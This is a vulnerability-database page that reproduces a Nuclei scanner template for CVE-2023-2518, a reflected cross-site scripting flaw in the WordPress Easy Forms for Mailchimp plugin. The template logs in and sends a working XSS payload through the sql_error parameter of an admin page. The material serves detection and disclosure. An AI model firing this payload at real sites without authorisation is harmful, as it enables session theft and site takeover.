Vulners
Lucene search
WordPress Easy Forms for Mailchimp Plugin < 6.8.9 - Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2023-2518 | 19 Mar 202521:02 | – | circl |
 | WordPress plugin Easy Forms for Mailchimp 跨站脚本漏洞 | 30 May 202300:00 | – | cnnvd |
 | CVE-2023-2518 | 30 May 202307:49 | – | cve |
 | CVE-2023-2518 Easy Forms for Mailchimp < 6.8.9 - Reflected XSS | 30 May 202307:49 | – | cvelist |
 | CVE-2023-2518 | 30 May 202308:15 | – | nvd |
 | WordPress Easy Forms for Mailchimp Plugin < 6.8.9 Multiple Vulnerability | 16 Jun 202300:00 | – | openvas |
 | Cross site scripting | 30 May 202308:15 | – | prion |
 | PT-2023-19962 · WordPress · Easy Forms For Mailchimp | 30 May 202300:00 | – | ptsecurity |
 | CVE-2023-2518 | 23 May 202501:53 | – | redhatcve |
 | CVE-2023-2518 Easy Forms for Mailchimp < 6.8.9 - Reflected XSS | 30 May 202307:49 | – | vulnrichment |
10
id: CVE-2023-2518
info:
name: WordPress Easy Forms for Mailchimp Plugin < 6.8.9 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The Easy Forms for Mailchimp plugin before version 6.8.9 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the sql_error parameter before outputting it back in the page when the debug option is enabled, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
impact: |
Attackers can inject malicious JavaScript through the sql_error parameter when debug mode is enabled, potentially stealing administrator session cookies and gaining full control over the WordPress site.
remediation: |
Update Easy Forms for Mailchimp plugin to version 6.8.9 or later that properly sanitizes and escapes the sql_error parameter before output.
reference:
- https://wpscan.com/vulnerability/ca120255-2c50-4906-97f3-ea660486db4c
- https://nvd.nist.gov/vuln/detail/CVE-2023-2518
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2518
cwe-id: CWE-79
epss-score: 0.15068
epss-percentile: 0.947
cpe: cpe:2.3:a:yikesinc:easy_forms_for_mailchimp:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 3
vendor: yikesinc
product: easy_forms_for_mailchimp
fofa-query: body="wp-content/plugins/yikes-inc-easy-mailchimp-extender/"
tags: cve,cve2023,wp,wordpress,wp-plugin,xss,yikes-inc-easy-mailchimp-extender,authenticated,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- "yikes-inc-easy-mailchimp-extender"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=yikes-mailchimp-edit-form&sql_error=%3Csvg%2Fonload%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<svg/onload=alert(document.domain)>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022018f4b8a18308d1814b3ffe924e863f67c2830550ae0e3ddb9ef6c88bb38418e1022100a8f451c6561219ba78b091f4b458f8c430c31e1a0617b7b6efb35de3ffa5b7dd:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.1
EPSS0.15068
SSVC